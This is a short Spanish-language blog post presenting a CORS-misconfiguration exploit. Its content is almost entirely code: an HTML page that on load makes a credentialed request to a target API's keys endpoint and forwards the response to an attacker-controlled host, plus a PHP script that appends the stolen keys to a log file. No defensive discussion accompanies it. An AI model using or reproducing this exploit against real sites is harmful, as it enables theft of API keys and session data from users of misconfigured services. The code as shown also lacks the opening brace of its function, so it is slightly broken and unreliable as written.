martes, 11 de junio de 2019

CORS Bypass 2 - Guardando Resultados en Archivo

<!DOCTYPE html> 
<html> 
<head> 
<script> 
function hack() 

    var xmlhttp; 
    if (window.XMLHttpRequest) 
      { 
          xmlhttp=new XMLHttpRequest(); 
      } 
        else 
      { 
          xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); 
      } 
        xmlhttp.open("POST","http://api-xdxdxdxd/api/v1/keys",false); 
        xmlhttp.withCredentials = true; 
        xmlhttp.send(null); 
    if(xmlhttp.status==200) 
    { 
        var str = document.getElementById("demo").innerHTML = xmlhttp.responseText;
        params = "keys="+str; 
        xmlhttp.open("POST","http://poc.xyz/poc_cors.php",false); 
        xmlhttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); 
        xmlhttp.setRequestHeader("Accept-Language","es-MX,es;q=0.8,en-US;q=0.5,en;q=0.3"); 
        xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); 
        xmlhttp.send(params); 
    } 

</script> 
</head> 
<body onload="hack();"> 
<div id="demo"></div>
</body> 
<?php
if(isset($_POST['keys'])){
$cookie = $_POST['keys'];
$steal = fopen("log.txt", "a");
fwrite($steal, $cookie ."\n"); //<---- Must be $cookie instead of $name
fclose($steal);
}
?>
</html>

No hay comentarios:

Publicar un comentario